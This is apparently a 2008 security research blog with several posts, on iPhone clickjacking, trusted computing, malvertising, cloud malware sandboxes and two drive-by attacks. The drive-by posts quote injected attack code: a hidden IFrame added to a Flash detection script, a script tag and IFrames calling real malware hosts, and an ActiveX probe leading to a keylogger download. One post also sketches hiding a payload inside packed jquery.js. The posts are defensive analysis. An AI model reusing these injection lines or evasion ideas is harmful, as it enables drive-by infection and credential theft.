Wednesday, November 26, 2008

Clickjacking - iPhone Style

In the past, I've blogged about clickjacking and how to defend against it. While Adobe has patched Flash Player to protect against one of the more frightening attacks, which could lead to hijacking of a victim's webcam and microphone, many browsers and applications remain vulnerable. In fact, a few days ago, when Apple released the latest firmware for the iPhone (v2.2), it turns out that they quietly addressed what some consider to be a clickjacking vulnerability in Mobile Safari, the iPhone's web browser. It's definitely a different version of clickjacking and it would be fair to argue that it's a different vulnerability altogether but it is interesting nonetheless, so for the sake of argument (and blog hits) I'll stick with the clickjacking title and describe in greater detail the unique aspects of this vulnerability.

Mobile Safari was not actually vulnerable to the 'traditional' version of clickjacking, but it is susceptible to this new variant, which was discovered by John Resig and reported to Apple (CVE-2008-4232). There is no proper definition for clickjacking, but I'll define it as "obfuscating web page content, in order to social engineer a victim into performing an action other than what was intended". Now I'll split clickjacking into the following categories:
  1. Layered Clickjacking - When Jeremiah Grossman and Robert Hansen first discussed clickjacking, they detailed how the use of z-index values in Cascading Style Sheets CSS) could be used to layer content on top of other content. Then, leveraging CSS opacity values, the transparency of the layered content could be adjusted to show content on the bottom, while hiding the content on top, which is actually interacted with. A demonstration of this technique is available here.
  2. Overflow Clickjacking - The iPhone vulnerability does not require z-index or opacity values. Instead, the problem stems from the fact that the content of an embedded IFRAME can be forced to overflow it's bounds and spill onto the parent page. This is accomplished by adjusting the size of the IFRAME leveraging CSS transforms, which are supported by the webkit engine.
Rather than talking about it, let's see overflow clickjacking in action.












Fig 1 - Not Vulnerable

Fig 2 - Vulnerable






iPhone Clickjacking Demo


In Fig 1 (not vulnerable), you can see both the IFRAME content and the page content. Both have identical forms for password submission, but the IFRAME form is submitted to the attacker controlled page. In Fig 2 (vulnerable), you can see that the evil IFRAME has overwritten the page contents and we only see one (evil) password submission form.

While this is interesting, in reality, it comes with some very real limitations that will restrict the usefulness of the attack. In order to be valuable, we need a situation where an attacker controls the content of an IFRAME on a targeted page. This could occur with mashups or banner ads. An attacker could deliver IFRAME content to a subscribing web page and overwrite a portion of the parent page. They would however need to know which page was pulling the content in order to properly align the new content in order to make for a convincing attack.

I expect that we'll see a whole host of clickjacking-esque attacks in the coming months, affecting various browsers/applications. The ability to format page content via CSS, DHTML, etc. and improper implementations of these standards leaves plenty of room for error.

Happy Thanksgiving!

- michael

Technical Quickie: building SpiderMonkey on FreeBSD 6.2 AMD64

I wanted to get Didier Stevens modified SpiderMonkey Javascript engine compiled and running on a FreeBSD 6.2 AMD64 box. It turns out the config files shipped with his 1.7.0 version do not include FreeBSD support, so I wound up having to hack something together...and I thought I would share what I did in case others are interested. I assume these instructions would be relatively applicable to later FreeBSD versions as well.

When you go to build the source, config.mk pulls in an appropriate file in config/ to use for your system. On FreeBSD 6.2 AMD64, the output of 'uname –s' and 'uname –r' essentially lead to the config file named 'config/FreeBSD6.2-RELEASE.mk'. So what I wound up doing was go into the config/ directory and copy the 'Linux-All.mk' file to 'FreeBSD6.2-RELEASE.mk'.

If we were building on an x86 (32-bit) FreeBSD platform, that might be all we need to do. However, since we're building on AMD64 (64-bit), this configuration file needs to be modified because the default Linux configuration file references 64-bit CPU architecture as 'x86_64'; on FreeBSD AMD64, the CPU architecture is reported as 'amd64'. Fortunately the fix is simple: just do a find/replace on all values of 'x86_64' and change them to 'amd64'. There are three changes total.

Now that you've made those changes, you should be all set. Just build the application ("gmake –f Makefile.ref") and then grab the 'js' binary out of the 'FreeBSD6.2-RELEASE_DBG.OBJ/' directory.

Enjoy.

- Jeff

Not all P2P is evil

Allow me to step up on this conveniently available box of soap for a minute. I can't tell you the number of discussions I’ve been in where my conversation partner erroneously assumed that "P2P" was strictly synonymous with file sharing, copyright infringement, bandwidth hogging, and corporate time wasting. My viewpoint is that the term "P2P" references a specific network/communication design (i.e. arbitrary peers talk to other peers, rather than clients talk to dedicated servers), and not a particular usage. In other words, P2P is a communication technology platform that is agnostic to the application built on top of it. There are video delivery applications, file sharing applications, VoIP applications, IM applications, and privacy shielding applications that are built using P2P as their communication framework. You cannot define P2P as being any single one of those (particularly file sharing); and there are many legitimate uses for many of those listed applications. In fact, many businesses use functional non-P2P alternatives of those same types of applications on a daily basis.

Now, I completely understand and agree that P2P has received this bad reputation because the earliest adopters of the P2P communication model were applications that many organizations consider questionable. That's why I'm always happy to find uses of P2P that provide a positive benefit. A recent example I ran across was the
Network Early Warning System (NEWS), which uses P2P communication to cross-talk and alert about network connectivity and traffic issues. The Northwestern University Aqualab (creators of NEWS) liken NEWS to a "neighborhood watch for the Internet," with particular benefits to ISPs. Aqualab also has many other ongoing projects that relate to improving the performance and scalability of P2P communication models.

There is also
Pando, a company that offers what they call a "peer assisted" content delivery service that is targeted to businesses needing to deliver large amounts of media to their users. Basically they have married the traditional CDN concept with a P2P communication and distribution model, resulting in something they say scales significantly better (thus making less costly) than the traditional CDN approach. As an aside, our research shows that Pando is actually a tweaked version of BitTorrent that runs over standard SSL, which allows it to be served over port 443 with ease.

So the next time someone says "P2P is evil," remind them that P2P is just a platform utilized by many different applications, and they should clarify which P2P application(s) they have in mind.

- Jeff

Thursday, November 20, 2008

Trusted Computing is Chasing Yesterday's Problems

Earlier this week I was able to stop by the CSI 2008 conference. I was only able to take in a couple of the presentations, including a keynote by Steve Hanna, a Distinguished Engineer at Juniper Networks. Steve was speaking about trusted computing, explaining what it is and how it will tackle some of the security problems that we face. Now I'll confess that I've never been completely sold on the concept of trusted computing. I've tended to view it as somewhat of an ivory tower initiative that might work fine in a structured, high-security environment such as a DoD network, but not overly practical for the 'real world'. That said, Steve made some strong points about the value of Trusted computing and argued that it's closer to becoming a mainstream reality than I'd realized.

Steve detailed three primary layers for his vision of Trusted computing:
  1. Trusted hardware - The Trusted Platform Module (TPM) has a unique, secret RSA key burned into it at the time of manufacture and can be used for hardware identification. The TPM specification was developed by the Trusted Computing Group and many chip manufacturers have included a TPM in laptop chip sets since 2006.
  2. Tusted Operating System - Projects such as the NSA High Assurance Platform Program seek to leverage the TPM to create the foundation of a secure operating system.
  3. Network Access Control - Protecting access to resources or network.
Now I can envision how such a system, if implemented could go a long way towards limiting the spread of malicious code by ensuring that untrusted binaries are simply not permitted to execute on a given system. The problem with such an approach is that it works in opposition to the open nature of the Internet, a principal that we've come to know and love. Would users be willing to be restricted in the applications that can be run on their machines? I don't think so. In general we're willing to accept security risks in favor of an open architecture that allows flexibility. For proof, look no further than the cell phone industry. Cell phones were once inflexible boxes that ran specific applications and if you didn't like it, you could buy another phone. Today however, Telecoms are tripping over one another to show just how open they are and how they welcome third party applications. Will this break down barriers for mobile malicious code? Sure, but consumers don't care. They want flexibility.

My second concern with the vision for trusted computing is that it will do little to prevent web based attacks which don't require binary code execution and threats of this nature will only continue to grow. Take Clickjacking for example. This is really a social engineering attack. You are convincing someone to perform an action which they did not intend to do, because you are able to manipulate the look and feel of the page that they're viewing. Cross Site Request Forgery is another great example. Once again, the attack leverages web functionality as it was designed. No binary execution is required.

After listening to Steve's keynote, I have a better understanding and appreciation for trusted computing. However, I'm more convinced than ever that it's focused on yesterday's attacks, while we as an industry need to be looking to tomorrow.

- michael

Monday, November 17, 2008

Hiding web 2.0 malware in plain sight

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.

Recently we ran across a modified version of Adobe's Javascript-based Flash detection script used as part of a drive-by attack on web browsers. Basically the malware writers took the Flash Player Version Detection v1.7 script (AC_RunActiveContent.js) and tweaked it with a malicious payload. The heart of the evilness was caused simply adding one line, towards the end of the script:

document.write("<i"+"fr"+"ame
src='http://__someplace__.com/
pdfdoc/index.php?id=com2'
width=1 height=1></ifr"+"am"+"e>");

This causes the script to write out an IFrame tag that pointed to a malware site which then tried to deliver exploits to the browser in an attempt to cause arbitrary code execution.

I'm willing to speculate that anyone doing a shallow/naive review of the script could prematurely conclude that the script is the proper Adobe Flash detection script and thus dismiss it as non-evil. Hopefully though many investigators would plow through the entire file and eventually see the plain-as-day extra IFrame code added, and thus see through the facade.

However, what if the IFrame code wasn’t easily visible? Javascript 'packers' (programs that transform the Javascript code into smaller, more concise code) are becoming the norm on the web for slimming down Javascript code and saving some transfer bandwidth. They work by rewriting the code and essentially obfuscate what is going on as a byproduct. This can make it much more difficult to understand what the Javascript code is doing simply by casually perusing it; a simple Javascript 'document.write' of a malicious IFrame tag may not be so glaringly obvious anymore. And unfortunately, unlike executable (.EXE) packers such as UPX, the Javascript packers are used by many web sites and projects for legitimate reasons...so the mere presence of a packed Javascript file isn't an immediate red flag of its malicious intent (i.e. alerting on packed Javascript files is going to result in a lot of false positives).

How does this help attackers? Well, even though alerting on every packed Javascript file is not recommended, packing should still at least raise the suspicion level. An attacker taking their 'evil.js' file and packing it might obfuscate what evil.js is doing, but the fact that it's a packed file of unknown function may still cause people to investigate. Instead, an attacker can extend the previously mentioned tactic of hiding a malicious payload inside a legitimate Javascript library...but this time, pick a library that is commonly distributed in packed form and widely used. For example, we see packed versions of the JQuery Javascript library quite often on many different sites. A clever attacker could take the (unpacked) jquery.js file, insert their malicious code, pack it using the same packer normally seen used with jquery.js, and then deploy it. Anyone encountering this malicious file, at first glance, may consider it to just be the usual packed jquery.js file and ignore it; any automated signatures meant to flag packed Javascript files would, on the surface, not really differentiate between the packed original version and the packed modified version. And any advanced investigation into the file by looking at the code's behavior (or 'unpacking' it via various means) will, at first, just seem to be the standard set of JQuery functionality. Only those who continue to persist past all the obvious signs that the file is a legitimate jquery.js Javascript file would perhaps encounter the maliciousness of this web 2.0 Trojan horse.

Fortunately there is a workable solution to this problem: whitelists of known-good Javascript file hashes. Since the obvious targets are widely-deployed Web 2.0 Javascript libraries (JQuery, Dojo, SWFObject, Prototype, etc.) it would be feasible to construct a whitelist of the true/safe versions of these popular library files. Of course, maintaining a whitelist is a time-consuming effort, especially with new versions of each library coming out so often. And site designers would need to be encouraged to not make any personalizations/modifications directly to these standard library files, lest they trigger the alarms. It would be interesting if such a whitelist was then utilized by browser extensions such as NoScript to know automatically which Javascript files are safe to execute...but vetting the function library is a minor part of the problem since the site still needs to use custom Javascript to access/utilize the library in the first place.

It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,

- Jeff

Thursday, November 13, 2008

Stepping Through a Mass Web Attack

A few days ago, Kaspersky reported on yet another mass web attack. Such attacks are quickly becoming a preferred attack vector as they permit mass infection with minimal effort. We've seen this before, and not just once. In fact, it seems to be popular among Chinese hackers and is often used to gather authentication credentials for online games. While it hasn't yet been verified, it appears that SQL injection vulnerabilities on vulnerable servers led to the initial infection. All infected servers seem to be running Microsoft ASP pages, a common target for those seeking sites vulnerable to SQL injection.

I'm fascinated by such attacks as they illustrate the interconnected nature of the web and shatter the myth that you are safe if you stick to browsing reputable sites. Sadly, reputable sites struggle with vulnerabilities on a regular basis. The unfortunate reality is that any site, no matter how big or small, could be infected. In this latest attack, Travelocity was compromised. While vulnerable servers were infected, the true targets of these attacks are the end users which visit the sites. I've been preaching for some time now that we need to shift our focus from servers to browsers. We spend the majority of our security resources locking down servers and put minimal effort into protecting users browsing the web. Attackers have shifted their focus and we must do the same.

Attack Walk-Through

According to Kaspersky, the attack leverages multiple browser vulnerabilities and a variety of sites to host the attack scripts and malicious code. In order to better understand how these attacks succeed, let's walk through one such attack scenario which was live at the time this blog was written:

Step 1 - Server Infection

The attack begins by injecting code onto as many vulnerable web servers as possible. This is commonly accomplished via SQL injection. In this specific example, the following code was injected:

<script src="http://dbios.org/h.js">

This code won't change the appearance of the page, so a victim has no way of knowing that the so-called reputable page, is actually launching an attack on his browser. A quick Google search illustrates the mass nature of the attack and reveals that many sites are still infected.

Step 2 - Redirects

The initial JavaScript file typically doesn't contain the ultimate attack, but rather calls a variety of other scripts from different locations. This may be done in part to obfuscate the attack but is more likely done simply to accommodate multiple vulnerabilities and download sites in order to make the attack more robust and reach as many potential victims as possible. In our case, the following two IFRAMEs are added to the page:

document.write("<iframe width='20' height='0' src='http://vvexe.com/haha/index.html'></iframe>");
document.write("<iframe width='0' height='0' src='http://www.kenya.com/faq.htm'></iframe>");


Kasperky discusses that this latest round targets a variety of vulnerabilities in web browsers and Maromedia Flash Player. In our example, the exploitation is going after a vulnerability in the Snapshot Viewer for Microsoft Access ActiveX control, published on August 12, 2008 and detailed in MS08-041. One of the IFRAMEs contains code which attempts to instantiate the Snapshot Viewer ActiveX control as shown below:

try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("("<iframe width=50 height=0 src=ff.htm></iframe>");}}

As can be seen, if the ActiveX control is indeed accessible, the browser then opens yet another IFRAME from http://vvexe.com/haha/ff.htm and this is where the attack actually lies. The writers of this exploit are either not particularly skilled or just lazy as they've simply leveraged an already public exploit line for line and simply changed the target download to http://ip.kanlang.com/haha/down.exe.

Step 4 - Client Infection

The down.exe executable is a Trojan, which goes by various aliases, including Infostealer.Wowcraft. The Trojan serves as a keylogger and is designed to harvest and transmit authentication credentials for World of Warcraft.

Lessons Learned
  1. Surfing 'reputable sites' is not guaranteed to prevent infection.
  2. A server side compromise is often the first step in a client side attack.
  3. Defense in depth is critical. In this situation, the threat can be mitigated by patch management, network and host based AV and blocking malicious URLs.
Happy surfing!

- michael

Friday, November 7, 2008

Cloud Services for Analyzing Malware

Despite continuing promises from software vendors, malware isn't going anywhere. Analyzing malware to protect against it and repair the damage that it may have done, is a significant part of the job description for many security professionals. The sheer volume of malware can make dealing with it an overwhelming task. Fortunately, a number of free cloud-based services have emerged to aid in the task of analyzing malware.

I'll divide the analysis tools into two categories - Anti-Virus Multi-Scanners and Sandboxes. The former is nothing more than a collection of AV scanners designed to run together analyzing the same file and return the different results for each AV vendor. This can be a very valuable starting point. It is frustrating to spend hours or days conducting deep analysis on a new binary only to find out that AV vendors have already analyzed the same file previously. A quick run through a multi-scanner can help to let you know if you're dealing with 0day or yesterday's news. Sandboxes on the other hand are emulation environments which perform automated behavioral analysis on a binary file. They allow the binary to execute and emulate the services that it attempts to interact with. Meanwhile, they are recording the activity which is occurring such as file reads/writes, registry access and network traffic.

AV Multi-Scanners

Building your own multi-scanner isn't a terribly difficult or expensive challenge. You need to obtain AV SDKs or command line tools from various vendors, develop a wrapper/front-end to simultaneously submit the same malicious code samples to all at the same time and parse/combine the results into a meaningful report. While it may be valuable to put in the effort if you expect to feed a heavy and regular volume of binaries into the multi-scanner, say for a honeypot network, there are free online alternatives if you're looking for only occasional analysis. Below is a chart comparing the functionality of a couple of popular (and free) multi-scanners.








VirusTotalVirScan.org
No. of Engines3439
Zip supportNoYes
Web SubmissionsYesYes
Email SubmissionsYesNo
SSL SupportYesNo


Sandboxes

Sandboxes automate the process of behavioral analysis. They permit a binary to execute in a controlled environment and monitor the activity which occurs. Given that we're dealing with malicious code, the binaries will generally attempt to spread, often by scanning for vulnerable hosts. Rather than actually permit malware to spread externally, sandboxes can simulate network responses to allow the binary to continue executing without actually permitting third party infection. If a steady volume of analysis is required you'll want to consider commercial products such as those offered by Norman and Sunbelt Software, however, such solutions can be expensive. If you only require periodic analysis, both vendors offer free web based access to their platforms. Anubis, by contrast, is purely a free web based service and does not have a commercial product offering. The chart below compares the functionality of these three cloud based sandboxes:









AnubisNorman SandboxCWSandbox
URL AnalysisYesNoNo
Zip SupportYesNoNo
SSL SupportYesNoNo
Email ResultsYesYesYes
Dependent BinariesYesNoNo


As can be seen, for an entirely free service, Anubis has an impressive feature set. They even encourage the automated of binaries for analysis so the platform can even be integrated into a honeypot network.

It's great to see free resources emerging for malware analysis. As mentioned, these free services won't meet everyone's needs, but if you're tasked with securing a network and only occasionally need analysis capabilities, these sites can significantly streamline your efforts.

- michael

Trust two times removed

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a real-life security incident that I recently reviewed in post-mortem fashion. The plot is simple: while the person was surfing the web, their browser was exploited by a piece of malware targeting a popular browser plugin. However, it's the details that make this story a bit intriguing...and scary.

The person's surfing session was quite normal and not particularly careless. During the moments just before the incident, the person was using Google to find an answer to a technical question. One of the top search results was for a smaller site that hosted technical tidbits of information collected and donated from various information sources. The person clicked through to that site. Now, this site is not a site that would be considered to have a 'risky' reputation, nor does it harbor any direct malware. It's just a normal, basic site that looks to be someone's personal project (site was designed in FrontPage 6.0!) to better the world by collecting and publishing useful information. In fact, the only thing questionable about it is the number of syndicated ads on the page: 7, by our count, from multiple vendors (BidVertiser, Google, Clicksor, and FastClick). Of course, it makes sense that they would (over-)populate their page(s) with ads in an attempt to generate revenue from their content publishing efforts. But this turned out to be the problem.

See, once the person's browser landed on this ad-infested page, the browser started running around like mad to fetch all the syndicated ad content. Each ad syndication attempt usually results in multiple browser requests because the main requests to the ad syndicator often results in a chain of redirects eventually landing at the specific content of the "advertisee" utilizing the syndication service. As the term 'syndication' implies, the ad services are just the middle-man between the web site and the advertisee. And the website is just the middle-man between the ad service and the web surfer.

Anyways, what eventually happened is that one of the ad syndicators served up an advertisee's ad...and it just so happened that the ad was actually a piece of malware that could immediately compromise the vulnerable browser plugin. This is not necessarily new news;
attackers have been known for quite a while to leverage advertising syndication as a way to spread their malware. But it's a bit scary to witness in action, and the growing amount of advertising syndication utilized by web sites is going to make it a more predominant malware delivery vector. The problem is exacerbated by the fact that the ads are no longer simple graphics; advertising syndicators usually allow their clients (the advertisees) to specify arbitrary HTML. This gives the advertisee cart blanche to use rich media ads that rely on multiple technologies such as DHTML, Javascript, Flash, etc. But this also gives an attacker full access to syndicate any arbitrary piece of malware that could be hosted/served via a normal web page. (Side note: maybe Google is onto something by only using pure text-based ads; the text is very easy to validate and stands practically no chance of harboring a piece of malware...)

What does this all mean? Well, there are a few things. First, all of those vendors who suggest an exploit is partially mitigated by the requirement that a "user must visit a malicious web page in order to be attacked" need to change their tune, because advertising syndication is essentially bringing the malicious web pages (via rich media ad capabilities) to the user. Second, the onus is on the advertising syndication services to ensure their clients aren't trying to deliver malware ads through the service. That's a tall order, and the ad vendors
have not exactly been batting 1000. Third, in the age of mashups and syndication, we no longer have a situation where a user has to only decide whether they trust the destination web site or not; they must now trust all the components that are mashed and syndicated into that site, and in turn trust all the components those components use, etc. In the incident I just talked about, we have the person trusting the web site, the web site trusting the advertising services, and the advertising services trusting their clients. Thus we come to having trust two times removed. Worse, web browser do not equip people with the necessary tools to really help them manage this trust chain effectively; it's pretty much an all-or-nothing shot based upon the user's trust of the immediate target web site. In the meantime, maybe browser plugins like AdBlockPlus and NoScript could help, although that essentially robs legitimate sites of advertising revenue. However, if enough users start to use ad blocking software as a matter of security, perhaps the advertising services will become pickier about their clientele and better scrutinize what they are actually syndicating.

Only time will tell, I suppose.
- Jeff

ps. if you are interested in which advertising vendor was the 'enabler' for the mentioned incident, well, we can not say with 100% certainity. But
there does seem to be a popular opinion against one of the vendors.